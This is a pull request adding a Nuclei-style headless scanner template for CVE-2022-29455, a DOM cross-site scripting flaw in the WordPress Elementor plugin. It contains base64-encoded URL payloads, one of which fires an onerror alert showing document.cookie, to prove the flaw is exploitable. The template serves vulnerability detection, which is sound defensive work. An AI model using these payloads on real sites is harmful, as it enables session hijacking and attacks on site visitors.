### PR TITLE
Adding headless logic to cve-2022-29455 to prove exploitation

### DIFF
--- a/headless/cves/2022/CVE-2022-29455.yaml
+++ b/headless/cves/2022/CVE-2022-29455.yaml
@@ -1,0 +1,48 @@
+id: CVE-2022-29455
+
+info:
+  name: WordPress Elementor Website Builder <= 3.5.5 - DOM Cross-Site Scripting
+  author: rotembar,daffainfo
+  severity: medium
+  description: |
+    WordPress Elementor Website Builder plugin 3.5.5 and prior contains a reflected cross-site scripting vulnerability via the document object model.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
+  remediation: |
+    Upgrade WordPress Elementor Website Builder to version 3.5.6 or later to mitigate this vulnerability.
+  reference:
+    - https://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor
+    - https://www.rotem-bar.com/elementor
+    - https://patchstack.com/database/vulnerability/elementor/wordpress-elementor-plugin-3-5-5-unauthenticated-dom-based-reflected-cross-site-scripting-xss-vulnerability
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-29455
+    - https://wordpress.org/plugins/elementor/#developers
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-29455
+    cwe-id: CWE-79
+    epss-score: 0.0019
+    epss-percentile: 0.56534
+    cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: elementor
+    product: website_builder
+    framework: wordpress
+  tags: cve,cve2022,xss,wordpress,elementor
+
+headless:
+  - steps:
+      - args:
+          url: "{{BaseURL}}/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCdudWNsZWknKTwvc2NyaXB0PiJ9"
+        action: navigate
+
+      - action: waitdialog
+        name: reflected_topicId_query
+
+    matchers:
+      - type: dsl
+        dsl:
+          - reflected_topicId_query == true
+          - reflected_topicId_query_message == "nuclei"

--- a/headless/cves/2022/CVE-2022-29455.yaml
+++ b/headless/cves/2022/CVE-2022-29455.yaml
@@ -35,14 +35,20 @@ info:
 headless:
   - steps:
       - args:
-          url: "{{BaseURL}}/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCdudWNsZWknKTwvc2NyaXB0PiJ9"
+          url: "{{BaseURL}}/#elementor-action:action=lightbox&settings=ewogICAgInR5cGUiOiAidmlkZW8iLAogICAgInVybCI6ICJodHRwOi8vIiwKICAgICJ2aWRlb1R5cGUiOiAiaG9zdGVkIiwKICAgICJ2aWRlb1BhcmFtcyI6IHsKICAgICAgICAib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbisnICcrZG9jdW1lbnQuY29va2llKSIsCiAgICAgICAgInN0eWxlIjogImJhY2tncm91bmQtY29sb3I6cmVkIgogICAgfQp9"
         action: navigate
 
       - action: waitdialog
-        name: reflected_topicId_query
+        name: elementor_dom
 
+    matchers-condition: and
     matchers:
       - type: dsl
         dsl:
-          - reflected_topicId_query == true
-          - reflected_topicId_query_message == "nuclei"
+          - elementor_dom == true
+
+      - type: word
+        part: body
+        words:
+          - "elementor"
+        case-insensitive: true


### PR DESCRIPTION
### Template / PR Information

Adding headless template for this dom-based xss to prove exploitation

### Template Validation

I've validated this template locally?
- [X] YES
- [ ] NO

![headless-2022-29455](https://github.com/user-attachments/assets/dd05986d-971c-41f0-9edc-f91dc3c90b3e)
